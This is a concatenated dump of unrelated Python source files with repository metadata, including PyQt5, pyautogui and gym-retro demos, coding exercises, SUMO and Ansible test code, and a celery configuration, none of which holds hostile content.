[ "Unlicense", "MIT" ]
null
null
null
#!/usr/bin/python # -*- coding: utf-8 -*- #pyqt_sw23_MouseEvent.py import sys from PyQt5.QtCore import (Qt, QTimer, QRect) from PyQt5.QtWidgets import (QWidget, QPushButton, QApplication, QLabel) from PyQt5.QtGui import QPainter, QColor, QFont from PyQt5.QtGui import QPixmap, QKeyEvent class Ui(QWidget): #statische Klassenvariablen mouse_pos_x = 0 mouse_pos_y = 0 def __init__(self): #Konstrukor #Konstruktor der Elternklasse aufrufen super(Ui, self).__init__() self.initUI() def initUI(self): #UI-Fenster Konfigurieren self.setGeometry(30, 30, 600, 600) self.setWindowTitle('Qt - Mouse Event') self.setMouseTracking(True) self.show() def mouseMoveEvent(self, event): #Methode der QWidget-Klasse self.mouse_pos_x = event.x() self.mouse_pos_y = event.y() #print Mouse Position print('x: %d y: %d' % (self.mouse_pos_x, self.mouse_pos_y)) def mousePressEvent(self, event): #Methode der QWidget-Klasse if event.button()== Qt.LeftButton: print('Linksklick') if event.button()== Qt.RightButton: print("Rechtsklick") def mouseDoubleClickEvent(self, event): #Methode der QWidget-Klasse if event.button()== Qt.LeftButton: print('Linksklick doppelt, mit Rechtsklick doppelt wird es wieder klein') #self.showMaximized() #mit Titelzeile self.showFullScreen() #ohne Titelzeile if event.button()== Qt.RightButton: print("Rechtsklick doppelt") self.showNormal() #urspruengiche Groesse #self.showMinimized() #ganz weg def paintEvent(self, event): #Methode der QWidget-Klasse p = QPainter() p.begin(self) self.drawFunc(event, p) p.end() def keyPressEvent(self, event): #Methode der QWidget-Klasse if event.key() == Qt.Key_Left: self.keyLeft = True if event.key() == Qt.Key_Right: self.keyRight = True def keyReleaseEvent(self, event): #Methode der QWidget-Klasse if event.key() == Qt.Key_Left: self.keyLeft = False if event.key() == Qt.Key_Right: self.keyRight = False event.accept() def drawFunc(self, event, p): #Hintergrund mit Pixmap pix = QPixmap("gras.jpg") p.drawPixmap(self.rect(),pix) if __name__ == '__main__': app = QApplication(sys.argv) ui = Ui() sys.exit(app.exec_())
33.175
85
0.589676
e9e5ca591180e68e5942d7efb72a444d291477f7
77
py
Python
Online-Judges/CodingBat/Python/Warmup-01/03-sum_double.py
shihab4t/Competitive-Programming
e8eec7d4f7d86bfa1c00b7fbbedfd6a1518f19be
[ "Unlicense" ]
3
2021-06-15T01:19:23.000Z
2022-03-16T18:23:53.000Z
Online-Judges/CodingBat/Python/Warmup-01/03-sum_double.py
shihab4t/Competitive-Programming
e8eec7d4f7d86bfa1c00b7fbbedfd6a1518f19be
[ "Unlicense" ]
null
null
null
Online-Judges/CodingBat/Python/Warmup-01/03-sum_double.py
shihab4t/Competitive-Programming
e8eec7d4f7d86bfa1c00b7fbbedfd6a1518f19be
[ "Unlicense" ]
null
null
null
def sum_double(a, b): if a == b: return (a+b)*2 else: return a+b
12.833333
21
0.519481
a15ced1edd95d5755d2aa895aec50099e9ad43f2
448
py
Python
src/onegov/org/models/recipient.py
politbuero-kampagnen/onegov-cloud
20148bf321b71f617b64376fe7249b2b9b9c4aa9
[ "MIT" ]
null
null
null
src/onegov/org/models/recipient.py
politbuero-kampagnen/onegov-cloud
20148bf321b71f617b64376fe7249b2b9b9c4aa9
[ "MIT" ]
null
null
null
src/onegov/org/models/recipient.py
politbuero-kampagnen/onegov-cloud
20148bf321b71f617b64376fe7249b2b9b9c4aa9
[ "MIT" ]
null
null
null
from onegov.core.orm.mixins import content_property from onegov.recipient import GenericRecipient, GenericRecipientCollection class ResourceRecipient(GenericRecipient): __mapper_args__ = {'polymorphic_identity': 'resource'} send_on = content_property() resources = content_property() class ResourceRecipientCollection(GenericRecipientCollection): def __init__(self, session): super().__init__(session, type='resource')
29.866667
73
0.787946
3d740609ff1f485574f2febbb5422c34d0cb75ed
3,146
py
Python
PMIa/2015/NIKISHIN_P_S/task_10_22.py
YukkaSarasti/pythonintask
eadf4245abb65f4400a3bae30a4256b4658e009c
[ "Apache-2.0" ]
null
null
null
PMIa/2015/NIKISHIN_P_S/task_10_22.py
YukkaSarasti/pythonintask
eadf4245abb65f4400a3bae30a4256b4658e009c
[ "Apache-2.0" ]
null
null
null
PMIa/2015/NIKISHIN_P_S/task_10_22.py
YukkaSarasti/pythonintask
eadf4245abb65f4400a3bae30a4256b4658e009c
[ "Apache-2.0" ]
null
null
null
# Задача 10. Вариант 22. # 1-50. Напишите программу "Генератор персонажей" для игры. Пользователю должно быть предоставлено 30 пунктов, которые можно распределить между четырьмя характеристиками: Сила, Здоровье, Мудрость и Ловкость. Надо сделать так, чтобы пользователь мог не только брать эти пункты из общего "пула", но и возвращать их туда из характеристик, которым он решил присвоить другие значения. # Nikishin P. S. # 27.05.2016 pool = 40 score = 40 hero = {"Сила":"0","Здоровье":"0","Мудрость":"0","Ловкость":"0"} points = 0 menu = None while menu != 0: print(""" 0 - Выход 1 - Добавить пункты к характеристикам 2 - Уменьшить пункты характеристик 3 - Просмотр характеристик""") menu = int(input("Выберите действие: ")) if menu == 1: print("Пожалуйста, введите характеристику для добавления пунктов. Для изменения доступны", len(hero), "характеристики:") for a in hero: print(a) harak = str(input("\nВедите характеристику: ")) harak = harak.title() while harak not in hero: print("Такая характеристика отсутствует: ") harak = str(input("\nВедите характеристику: ")) harak = harak.title() else: print("\nВведите количество пунктов,которое вы хотите назначить данной характеристике") print("Доступно",score, "пунктов") points = int(input("\nВведите количество пунктов:")) while points > score or points < 0: print("Вы не можете назначить такое количество пунктов") print("Доступно", score, "пунктов") points = int(input("\nВведите количество пунктов:")) hero[harak] = points print(points, "пунктов добавлено к", harak) score -= points elif menu == 2: print("Пожалуйста, введите имя характеристики для снятия пунктов." "Доступно изменение для: ") for a in hero: if int(hero[a]) > 0: print(a) harak = str(input("\Ведите характеристикуn:")) harak = harak.title() while harak not in hero: print("Нет такой характеристики, проверьте введенные данные: ") harak = str(input("\nВедите характеристику:")) harak = harak.title() else: print("\nВведите количество пунктов для характеристики. Доступно", hero[harak], "пунктов:") points = int(input("\n:")) while points > int(hero[harak]) or points < 0: print("Невозможно удалить такое количество пунктов. Доступно", hero[harak], "пунктов") points = int(input("\nВведите количество пунктов:")) hero[harak] = points print(points, "пунктов удалено") score += points elif menu == 3: print("\nХарактеристики героя") for a in hero: print(a, "\t\t", hero[a]) elif menu == 0: print("Досвидания! Всего наилучшего!") else: print("В меню отсутствует запрашиваемый пункт")
37.903614
379
0.587095
3def1b29e37a332d4d958bd4bd88114812ae6bb1
119
py
Python
crawlab/tasks/celery.py
anhilo/crawlab
363f4bf7a4ccc192a99850998c1bd0fc363832a1
[ "BSD-3-Clause" ]
1
2019-08-20T14:26:39.000Z
2019-08-20T14:26:39.000Z
crawlab/tasks/celery.py
anhilo/crawlab
363f4bf7a4ccc192a99850998c1bd0fc363832a1
[ "BSD-3-Clause" ]
9
2019-05-24T03:53:09.000Z
2022-02-26T10:53:48.000Z
crawlab/tasks/celery.py
anhilo/crawlab
363f4bf7a4ccc192a99850998c1bd0fc363832a1
[ "BSD-3-Clause" ]
1
2019-11-08T08:12:40.000Z
2019-11-08T08:12:40.000Z
from celery import Celery # celery app instance celery_app = Celery(__name__) celery_app.config_from_object('config')
19.833333
39
0.815126
9adc7243f4d1b70f6873f955bafaa824462615fa
249
py
Python
Licence 2/I33/TP 4/ex_9.py
axelcoezard/licence
1ed409c4572dea080169171beb7e8571159ba071
[ "MIT" ]
8
2020-11-26T20:45:12.000Z
2021-11-29T15:46:22.000Z
Licence 2/I33/TP 4/ex_9.py
axelcoezard/licence
1ed409c4572dea080169171beb7e8571159ba071
[ "MIT" ]
null
null
null
Licence 2/I33/TP 4/ex_9.py
axelcoezard/licence
1ed409c4572dea080169171beb7e8571159ba071
[ "MIT" ]
6
2020-10-23T15:29:24.000Z
2021-05-05T19:10:45.000Z
import random def liste_perm(n): L = [] for i in range(n): L += [i] i = 1 while i < n: perm = random.randrange(0, n-i) tmp = L[perm] L[perm] = L[n-i] L[n-i] = tmp i += 1 return L
15.5625
39
0.413655
b11713ccbb2131e4e20add32f21fdefe3fa8d9a0
4,015
py
Python
Co-Simulation/Sumo/sumo-1.7.0/tools/emissions/nefz.py
uruzahe/carla
940c2ab23cce1eda1ef66de35f66b42d40865fb1
[ "MIT" ]
4
2020-11-13T02:35:56.000Z
2021-03-29T20:15:54.000Z
Co-Simulation/Sumo/sumo-1.7.0/tools/emissions/nefz.py
uruzahe/carla
940c2ab23cce1eda1ef66de35f66b42d40865fb1
[ "MIT" ]
9
2020-12-09T02:12:39.000Z
2021-02-18T00:15:28.000Z
Co-Simulation/Sumo/sumo-1.7.0/tools/emissions/nefz.py
uruzahe/carla
940c2ab23cce1eda1ef66de35f66b42d40865fb1
[ "MIT" ]
1
2020-11-20T19:31:26.000Z
2020-11-20T19:31:26.000Z
#!/usr/bin/env python # Eclipse SUMO, Simulation of Urban MObility; see https://eclipse.org/sumo # Copyright (C) 2012-2020 German Aerospace Center (DLR) and others. # This program and the accompanying materials are made available under the # terms of the Eclipse Public License 2.0 which is available at # https://www.eclipse.org/legal/epl-2.0/ # This Source Code may also be made available under the following Secondary # Licenses when the conditions for such availability set forth in the Eclipse # Public License 2.0 are satisfied: GNU General Public License, version 2 # or later which is available at # https://www.gnu.org/licenses/old-licenses/gpl-2.0-standalone.html # SPDX-License-Identifier: EPL-2.0 OR GPL-2.0-or-later # @file nefz.py # @author [email protected] # @date 2014-01-14 """ Generates a ';'-separated file that contains the time line of the NEFZ driving cycle. """ from __future__ import print_function NEFZ1 = [ [11, 0, 0], [4, 1.04, -1], [0, 0, 15], [8, 0, 15], [2, -0.69, -1], [0, 0, 10], [3, -.93, -1], [0, 0, 0], [21, 0, 0], [5, 0.83, -1], [0, 0, 15], [2, 0, -1], [5, 0.94, -1], [0, 0, 32], [24, 0, 32], [8, -.76, -1], [0, 0, 10], [3, -.93, -1], [0, 0, 0], [21, 0, 0], [5, .83, -1], [0, 0, 15], [2, 0, -1], [9, .62, -1], [0, 0, 35], [2, 0, -1], [8, .52, -1], [0, 0, 50], [12, 0, 50], [8, -.52, -1], [0, 0, 35], [13, 0, 35], [2, 0, -1], [7, -.87, -1], [0, 0, 10], [3, -.93, -1], [0, 0, 0], [7, 0, 0], ] NEFZ2 = [ [20, 0, 0], [5, .83, -1], [0, 0, 15], [2, 0, -1], [9, .62, -1], [0, 0, 35], [2, 0, -1], [8, .52, -1], [0, 0, 50], [2, 0, -1], [13, .43, -1], [0, 0, 70], [50, 0, 70], [8, -.69, -1], [0, 0, 50], [69, 0, 50], [13, .43, -1], [0, 0, 70], [50, 0, 70], [35, .24, -1], [0, 0, 100], [30, 0, 100], [20, .28, -1], [0, 0, 120], [10, 0, 120], [16, -.69, -1], [0, 0, 80], [8, -1.04, -1], [0, 0, 50], [10, -1.39, -1], [0, 0, 0], [20, 0, 0] ] def build(what): t = 0 v = 0 a = 0 ts1 = [] vs1 = [] as1 = [] ts2 = [] vs2 = [] as2 = [] ts3 = [] vs3 = [] as3 = [] ct = 0 cv = 0 lv = 0 lt = 0 ts1.append(0) as1.append(0) vs1.append(0) for tav in what: [t, a, v] = tav[:3] v = v / 3.6 if v >= 0: # destination velocity if a != 0: print("ups %s" % tav) ts1.append(ct + t) as1.append(0) vs1.append(v) # via acceleration for it in range(0, t): ts2.append(ct + it) as2.append(a) mv = cv + a * float(it) if mv < 0: mv = 0 vs2.append(mv) # via speed (if not None, otherwise "keep in mind") if v >= 0: dt = float((ct + t) - lt) if dt != 0: dv = float(v - lv) a = dv / float(dt) for it in range(lt, ct + t): ts3.append(it) as3.append(a) vs3.append(lv + a * float(it - lt)) ct = ct + t if v >= 0: cv = v lv = v lt = ct return [ts1, vs1, as1, ts2, vs2, as2, ts3, vs3, as3] BASE = 3 ts = [] vs = [] ts1 = [] vs1 = [] ts2 = [] vs2 = [] ts3 = [] vs3 = [] t = 0 for c in [NEFZ1, NEFZ1, NEFZ1, NEFZ1, NEFZ2]: tmp = build(c) for i in range(0, len(tmp[BASE])): ts.append(tmp[BASE][i] + t) vs.append(tmp[BASE + 1][i]) # ts1.append(tmp[0][i]+t) # vs1.append(tmp[0+1][i]) # ts2.append(tmp[3][i]+t) # vs2.append(tmp[3+1][i]) # ts3.append(tmp[6][i]+t) # vs3.append(tmp[6+1][i]) t = t + tmp[BASE][-1] + 1 fdo = open("nefz.csv", "w") pv = 0 for i in range(0, len(ts)): fdo.write("%s;%s;%s\n" % (ts[i], vs[i] * 3.6, pv - vs[i])) pv = vs[i] fdo.close()
24.041916
77
0.440349
49516b57d0d0f33dd71e42650cd7a6279ade8bcf
1,629
py
Python
books/PythonAutomate/gui_automate/pyautogui_sample.py
zeroam/TIL
43e3573be44c7f7aa4600ff8a34e99a65cbdc5d1
[ "MIT" ]
null
null
null
books/PythonAutomate/gui_automate/pyautogui_sample.py
zeroam/TIL
43e3573be44c7f7aa4600ff8a34e99a65cbdc5d1
[ "MIT" ]
null
null
null
books/PythonAutomate/gui_automate/pyautogui_sample.py
zeroam/TIL
43e3573be44c7f7aa4600ff8a34e99a65cbdc5d1
[ "MIT" ]
null
null
null
import time import pyautogui # 주 모니터 사이즈 얻기 screen_width, screen_height = pyautogui.size() """마우스""" current_mouse_x, current_mouse_y = pyautogui.position() # 마우스 X, Y 좌표 얻기 pyautogui.moveTo(100, 150, duration=0.25) # 마우스 이동 0.25초 동안 이동 pyautogui.click() # 마우스 클릭 pyautogui.click(100, 200, duration=1) # 마우스 좌표 1초 동안 이동 후 클릭 pyautogui.click(500, 300, button="right", duration=0.25) # 마우스 오른쪽 버튼 클릭 pyautogui.click(500, 300, button="left", duration=0.25) # 마우스 왼쪽 버튼 클릭 pyautogui.click("help_icon.png") # help_icon.png 파일을 스크린 상에서 찾아 클릭 # 상대 좌표 이동 for i in range(3): pyautogui.move(100, 0, duration=0.25) # 오른쪽 pyautogui.move(0, 100, duration=0.25) # 아래 pyautogui.move(-100, 0, duration=0.25) # 왼쪽 pyautogui.move(0, -100, duration=0.25) # 위 # 마우스 끌기 pyautogui.click() # 현재 윈도우창 활성화 distance = 200 change = 20 while distance > 0: pyautogui.drag(distance, 0, duration=0.2) # 오른쪽 distance = distance - change pyautogui.drag(0, distance, duration=0.2) # 아래 pyautogui.drag(-distance, 0, duration=0.2) # 왼쪽 distance = distance - change pyautogui.drag(0, -distance, duration=0.2) # 위 # 마우스 스크롤 (양수: 올리기, 음수: 내리기) pyautogui.scroll(-100) """키보드""" pyautogui.write("Hello world!", interval=0.25) # 각각의 문자마다 0.25초 간격으로 입력 pyautogui.press("esc") # Esc 입력, 키 명칭은 pyautogui.KEY_NAMES에 있음 pyautogui.keyDown("shift") # shift 키 누른 상태로 유지 pyautogui.press(["left", "left", "left", "left"]) # 왼쪽 화살표 키 4번 입력 pyautogui.keyUp("shift") # shift 키 떼기 pyautogui.hotkey("ctrl", "c") # Ctrl-C hotkey 조합 입력 pyautogui.alert("This is the message to display.") # 경고창 띄우고 OK 누를 때 까지 프로그램 중지
33.244898
80
0.675261
4978c2185db81f3c0ea3ab2b2820e34016c557b7
584
py
Python
torba/torba/tasks.py
mittalkartik2000/lbry-sdk
a07b17ec0c9c5d0a88bc730caf6ab955e0971b38
[ "MIT" ]
4,076
2018-06-01T05:54:24.000Z
2022-03-07T21:05:52.000Z
torba/torba/tasks.py
mittalkartik2000/lbry-sdk
a07b17ec0c9c5d0a88bc730caf6ab955e0971b38
[ "MIT" ]
80
2018-06-14T01:02:03.000Z
2019-06-19T10:45:39.000Z
torba/torba/tasks.py
braveheart12/lbry-sdk
dc709b468f9dce60d206161785def5c7ace2b763
[ "MIT" ]
20
2018-06-27T21:52:22.000Z
2022-03-08T11:25:23.000Z
from asyncio import Event, get_event_loop class TaskGroup: def __init__(self, loop=None): self._loop = loop or get_event_loop() self._tasks = set() self.done = Event() def add(self, coro): task = self._loop.create_task(coro) self._tasks.add(task) self.done.clear() task.add_done_callback(self._remove) return task def _remove(self, task): self._tasks.remove(task) len(self._tasks) < 1 and self.done.set() def cancel(self): for task in self._tasks: task.cancel()
23.36
48
0.599315
b8d75f3e6a3776837c546ec4202d1c291ff9e457
942
py
Python
Python/M01_ProgrammingBasics/L03_ConditionalStatementsAdvanced/Exercises/Solutions/P03_NewHouse.py
todorkrastev/softuni-software-engineering
cfc0b5eaeb82951ff4d4668332ec3a31c59a5f84
[ "MIT" ]
null
null
null
Python/M01_ProgrammingBasics/L03_ConditionalStatementsAdvanced/Exercises/Solutions/P03_NewHouse.py
todorkrastev/softuni-software-engineering
cfc0b5eaeb82951ff4d4668332ec3a31c59a5f84
[ "MIT" ]
null
null
null
Python/M01_ProgrammingBasics/L03_ConditionalStatementsAdvanced/Exercises/Solutions/P03_NewHouse.py
todorkrastev/softuni-software-engineering
cfc0b5eaeb82951ff4d4668332ec3a31c59a5f84
[ "MIT" ]
1
2022-02-23T13:03:14.000Z
2022-02-23T13:03:14.000Z
flowers = input() qty = int(input()) budget = int(input()) price = 0 Roses = 5 Dahlias = 3.8 Tulips = 2.8 Narcissus = 3 Gladiolus = 2.5 if flowers == "Roses": if qty > 80: price = Roses * qty * 0.9 else: price = Roses * qty elif flowers == "Dahlias": if qty > 90: price = Dahlias * qty * 0.85 else: price = Dahlias * qty elif flowers == "Tulips": if qty > 80: price = Tulips * qty * 0.85 else: price = Tulips * qty elif flowers == "Narcissus": if qty < 120: price = Narcissus * qty * 1.15 else: price = Narcissus * qty elif flowers == "Gladiolus": if qty < 80: price = Gladiolus * qty * 1.2 else: price = Gladiolus * qty if price > budget: print(f'Not enough money, you need {price - budget:.2f} leva more.') else: print(f'Hey, you have a great garden with {qty} {flowers} and {budget - price:.2f} leva left.')
22.428571
99
0.56051
62786a1b62e28402836c7f170871c33f550107ef
4,015
py
Python
Gundlagen IT-Hardware/Aufgabe5u6.py
thieleju/studium
f23db7c7d2c30a2f0095cfdd25a4944c39d80d82
[ "MIT" ]
2
2021-11-16T22:53:25.000Z
2021-11-17T12:30:49.000Z
Gundlagen IT-Hardware/Aufgabe5u6.py
thieleju/studium
f23db7c7d2c30a2f0095cfdd25a4944c39d80d82
[ "MIT" ]
1
2022-02-23T18:56:51.000Z
2022-02-23T19:09:20.000Z
Gundlagen IT-Hardware/Aufgabe5u6.py
thieleju/studium
f23db7c7d2c30a2f0095cfdd25a4944c39d80d82
[ "MIT" ]
1
2022-01-24T16:54:10.000Z
2022-01-24T16:54:10.000Z
#!/usr/bin/env python import time import explorerhat as hat def decToBin(decimal): binArray = [0] * 4 temp = decimal if temp > 15 or temp < 0: print("decimal out of bounds!") return # example: decimal = 5 # 1st iteration (i=3): # binArray[3] = 5 % 2 = 1 -> [0, 0, 0, 1] # temp = 5 / 2 = 2 # 2nd iteration (i=2): # binArray[2] = 2 % 2 = 0 -> [0, 0, 0, 1] # temp = 2 / 2 = 1 # 3rd iteration (i=1): # binArray[1] = 1 % 2 = 1 -> [0, 1, 0, 1] # temp = 1 / 2 = 0 # temp = 0 -> exit loop, binArray = [0, 1, 0, 1] i = len(binArray) - 1 # 4-1 = 3 while temp > 0: binArray[i] = temp % 2 temp //= 2 # double / is needed in python version 3 or greater, otherwise /= returns fractions i -= 1 return binArray def binToDec(binArray): if len(binArray) > 4: print("binArray too many elements") return # i is the index # value is the value of the binArray[i] # example: binArray = [0, 1, 0, 1] (5 in decimal) # reverse array to [1, 0, 1, 0] # 1st iteration (i=0): # binArray[0] == 1 -> sum = 0 + 2^0 -> sum = 1 # 2nd iteration (i=1): # binArray[1] == 1 -> false # 3rd iteration (i=2): # binArray[2] == 1 -> sum = 1 + 2^2 -> sum = 1 + 4 = 5 # 4th iteration (i=3): # binArray[3] == 1 -> false sum = 0 for i, value in enumerate(reversed(binArray)): if value == 1: sum += 2**i return sum def visualizeBinary(decimal): arr = decToBin(decimal) for i in range(4): if arr[i] == 1: hat.light[i].on() elif arr[i] == 0: hat.light[i].off() def increaseCounter(): global counterInDec global counterInBin if counterInDec < 15: counterInDec += 1 else: counterInDec = 0 counterInBin = decToBin(counterInDec) visualizeBinary(counterInDec) def decreaseCounter(): global counterInDec global counterInBin if counterInDec > 0: counterInDec -= 1 else: counterInDec = 15 counterInBin = decToBin(counterInDec) visualizeBinary(counterInDec) def evaluateButtons(channel, event): global nim global counterInDec global counterInBin if event == 'press': # toggle nim mode if channel == 5: nim = not nim if nim == False: # number input mode disabled if channel == 6: # inc increaseCounter() if channel == 7: # dec decreaseCounter() if channel == 8: # reset counterInBin = [0, 0, 0, 0] counterInDec = 0 visualizeBinary(counterInDec) elif nim == True: # number input mode if channel == 8: nim = False if channel <= 4: # toggle bits # example: button2 pressed(channel=2), binArray = [0, 0, 0, 1] (1 in decimal) # -> counterInBin[2-1] = 1 - counterInBin[2-1] # -> [0, 0, x, 1] is switched to... # if x = 0: [0, 0, 0, 1] -> [0, 0, 1-0, 1] -> [0, 0, 1, 1] # if x = 1: [0, 0, 1, 1] -> [0, 0, 1-1, 1] -> [0, 0, 0, 1] counterInBin[channel-1] = 1 - counterInBin[channel-1] # convert binary to decimal counterInDec = binToDec(counterInBin) # toggle lights on off visualizeBinary(counterInDec) print("Button Press on "+str(channel), "NIM="+str(nim), counterInBin, counterInDec) # Global variables counterInDec = 0 counterInBin = [0, 0, 0, 0] nim = False hat.touch.pressed(evaluateButtons) hat.pause()
27.689655
103
0.479452
b29c70a6632455a1a288439e0c8f3067a0014c9d
2,467
py
Python
exercises/networking_selfpaced/networking-workshop/collections/ansible_collections/community/general/tests/unit/modules/network/netvisor/test_pn_admin_session_timeout.py
tr3ck3r/linklight
5060f624c235ecf46cb62cefcc6bddc6bf8ca3e7
[ "MIT" ]
null
null
null
exercises/networking_selfpaced/networking-workshop/collections/ansible_collections/community/general/tests/unit/modules/network/netvisor/test_pn_admin_session_timeout.py
tr3ck3r/linklight
5060f624c235ecf46cb62cefcc6bddc6bf8ca3e7
[ "MIT" ]
null
null
null
exercises/networking_selfpaced/networking-workshop/collections/ansible_collections/community/general/tests/unit/modules/network/netvisor/test_pn_admin_session_timeout.py
tr3ck3r/linklight
5060f624c235ecf46cb62cefcc6bddc6bf8ca3e7
[ "MIT" ]
null
null
null
# Copyright: (c) 2018, Pluribus Networks # GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt) from __future__ import (absolute_import, division, print_function) __metaclass__ = type from ansible_collections.community.general.tests.unit.compat.mock import patch from ansible_collections.community.general.plugins.modules.network.netvisor import pn_admin_session_timeout from ansible_collections.community.general.tests.unit.modules.utils import set_module_args from ..nvos_module import TestNvosModule class TestAdminServiceModule(TestNvosModule): module = pn_admin_session_timeout def setUp(self): self.mock_run_nvos_commands = patch('ansible_collections.community.general.plugins.modules.network.netvisor.pn_admin_session_timeout.run_cli') self.run_nvos_commands = self.mock_run_nvos_commands.start() def tearDown(self): self.mock_run_nvos_commands.stop() def run_cli_patch(self, module, cli, state_map): if state_map['update'] == 'admin-session-timeout-modify': results = dict( changed=True, cli_cmd=cli ) module.exit_json(**results) def load_fixtures(self, commands=None, state=None, transport='cli'): self.run_nvos_commands.side_effect = self.run_cli_patch def test_admin_session_timeout_modify_t1(self): set_module_args({'pn_cliswitch': 'sw01', 'pn_timeout': '61s', 'state': 'update'}) result = self.execute_module(changed=True, state='update') expected_cmd = ' switch sw01 admin-session-timeout-modify timeout 61s' self.assertEqual(result['cli_cmd'], expected_cmd) def test_admin_session_timeout_modify_t2(self): set_module_args({'pn_cliswitch': 'sw01', 'pn_timeout': '1d', 'state': 'update'}) result = self.execute_module(changed=True, state='update') expected_cmd = ' switch sw01 admin-session-timeout-modify timeout 1d' self.assertEqual(result['cli_cmd'], expected_cmd) def test_admin_session_timeout_modify_t3(self): set_module_args({'pn_cliswitch': 'sw01', 'pn_timeout': '10d20m3h15s', 'state': 'update'}) result = self.execute_module(changed=True, state='update') expected_cmd = ' switch sw01 admin-session-timeout-modify timeout 10d20m3h15s' self.assertEqual(result['cli_cmd'], expected_cmd)
44.854545
150
0.702878
0c161b64aac6b7eff8ff620e776c7c359b978c52
264
pyde
Python
sketches/runningorc00/runningorc00.pyde
kantel/processingpy
74aae222e46f68d1c8f06307aaede3cdae65c8ec
[ "MIT" ]
4
2018-06-03T02:11:46.000Z
2021-08-18T19:55:15.000Z
sketches/runningorc00/runningorc00.pyde
kantel/processingpy
74aae222e46f68d1c8f06307aaede3cdae65c8ec
[ "MIT" ]
null
null
null
sketches/runningorc00/runningorc00.pyde
kantel/processingpy
74aae222e46f68d1c8f06307aaede3cdae65c8ec
[ "MIT" ]
3
2019-12-23T19:12:51.000Z
2021-04-30T14:00:31.000Z
# Running Orc 00 from orcs import Orc orc = Orc(160, -48) def setup(): global bg bg = loadImage("field.png") frameRate(15) size(320, 320) orc.loadPics() orc.dy = 5 def draw(): background(bg) orc.move() orc.display()
13.894737
31
0.564394
a77fb80e23663e1e292fb097633fc97a5714a1ee
1,693
py
Python
retro/examples/discretizer.py
MatPoliquin/retro
c70c174a9818d1e97bc36e61abb4694d28fc68e1
[ "MIT-0", "MIT" ]
2,706
2018-04-05T18:28:50.000Z
2022-03-29T16:56:59.000Z
retro/examples/discretizer.py
MatPoliquin/retro
c70c174a9818d1e97bc36e61abb4694d28fc68e1
[ "MIT-0", "MIT" ]
242
2018-04-05T22:30:42.000Z
2022-03-19T01:55:11.000Z
retro/examples/discretizer.py
MatPoliquin/retro
c70c174a9818d1e97bc36e61abb4694d28fc68e1
[ "MIT-0", "MIT" ]
464
2018-04-05T19:10:34.000Z
2022-03-28T13:33:32.000Z
""" Define discrete action spaces for Gym Retro environments with a limited set of button combos """ import gym import numpy as np import retro class Discretizer(gym.ActionWrapper): """ Wrap a gym environment and make it use discrete actions. Args: combos: ordered list of lists of valid button combinations """ def __init__(self, env, combos): super().__init__(env) assert isinstance(env.action_space, gym.spaces.MultiBinary) buttons = env.unwrapped.buttons self._decode_discrete_action = [] for combo in combos: arr = np.array([False] * env.action_space.n) for button in combo: arr[buttons.index(button)] = True self._decode_discrete_action.append(arr) self.action_space = gym.spaces.Discrete(len(self._decode_discrete_action)) def action(self, act): return self._decode_discrete_action[act].copy() class SonicDiscretizer(Discretizer): """ Use Sonic-specific discrete actions based on https://github.com/openai/retro-baselines/blob/master/agents/sonic_util.py """ def __init__(self, env): super().__init__(env=env, combos=[['LEFT'], ['RIGHT'], ['LEFT', 'DOWN'], ['RIGHT', 'DOWN'], ['DOWN'], ['DOWN', 'B'], ['B']]) def main(): env = retro.make(game='SonicTheHedgehog-Genesis', use_restricted_actions=retro.Actions.DISCRETE) print('retro.Actions.DISCRETE action_space', env.action_space) env.close() env = retro.make(game='SonicTheHedgehog-Genesis') env = SonicDiscretizer(env) print('SonicDiscretizer action_space', env.action_space) env.close() if __name__ == '__main__': main()
30.781818
132
0.666864
ac18b683582b4daad6d0ff2ebdf8853f6d365076
993
py
Python
Python/Exercícios_Python/060_criando_um_menu_de_opções.py
vdonoladev/aprendendo-programacao
83abbcd6701b2105903b28fd549738863418cfb8
[ "MIT" ]
null
null
null
Python/Exercícios_Python/060_criando_um_menu_de_opções.py
vdonoladev/aprendendo-programacao
83abbcd6701b2105903b28fd549738863418cfb8
[ "MIT" ]
null
null
null
Python/Exercícios_Python/060_criando_um_menu_de_opções.py
vdonoladev/aprendendo-programacao
83abbcd6701b2105903b28fd549738863418cfb8
[ "MIT" ]
null
null
null
# -*- coding: utf-8 -*- """060 - Criando um Menu de Opções Automatically generated by Colaboratory. Original file is located at https://colab.research.google.com/drive/1ZRWz8qDYyffRbOffElSZ19QOPh6WqCEY """ from time import sleep v=0 op='4' while v!=5: while op=='4': n1=int(input('Digite Um Valor: ')) n2=int(input('Digite Outro Valor: ')) op=0 print('=-='*20) op=str(input('''[1] Somar [2] Multiplicar [3] Maior [4] Novos Números [5] Sair Do Progama ''')) if op=='1': print('A soma entre {} e {} é {}'.format(n1,n2,n1+n2)) elif op=='2': print('A multiplicação entre {} e {} é {}'.format(n1,n2,n1*n2)) elif op=='3': if n1>n2: print('{} é maior que {}'.format(n1,n2)) elif n1==n2: print('Os números são iguais') else: print('{} é maior que {}'.format(n2,n1)) elif op=='4': print('Escolha os novos números') elif op=='5': v=5 print('Finalizando...') sleep(3) print('Fim do progama.') else: print('Valor invalido, tente novamente.') sleep(2)
22.568182
77
0.623364
021dd5fcb717d7088251e2734e9f274420db546a
677
py
Python
vorl5-ueb2.py
haenno/FOM-BSc-WI-Semster3-Skriptsprachen-Python
bb34b6b1ba7e8fe7b22ce598a80d5011122c2d4a
[ "MIT" ]
null
null
null
vorl5-ueb2.py
haenno/FOM-BSc-WI-Semster3-Skriptsprachen-Python
bb34b6b1ba7e8fe7b22ce598a80d5011122c2d4a
[ "MIT" ]
null
null
null
vorl5-ueb2.py
haenno/FOM-BSc-WI-Semster3-Skriptsprachen-Python
bb34b6b1ba7e8fe7b22ce598a80d5011122c2d4a
[ "MIT" ]
null
null
null
# 5. Vorlesung 17.10.2020, Skript Python 4 (07_Python_04.pdf) # Übung 2: Datei auslesen, Summen aus Artikel Anz und Einzelpreisen bilden import re muster = "(\d+),.*\s(\d+\.\d+)" gesamtpreis = 0.0 qd = open("vorl5-ueb2-daten.txt","r") for qdZeile in qd: ergebnis = re.search(muster,qdZeile) if ergebnis: print("Gefunden: Artikelanzahl '"+ ergebnis.group(1)+"' und Einzelpreis '"+ ergebnis.group(2)+"'") gesamtpreis = gesamtpreis + (float(ergebnis.group(1))*float(ergebnis.group(2))) print("Zwischensumme: " + str(gesamtpreis)) else: print("In dieser Zeile nichts gefunden!") print("\n ==> Gesamtsumme = %.2f Euro" % gesamtpreis)
35.631579
106
0.655835
0c8488ca60dfe91b17ea2710a850c765a9d70947
1,421
py
Python
dmx/_open_dmx_usb.py
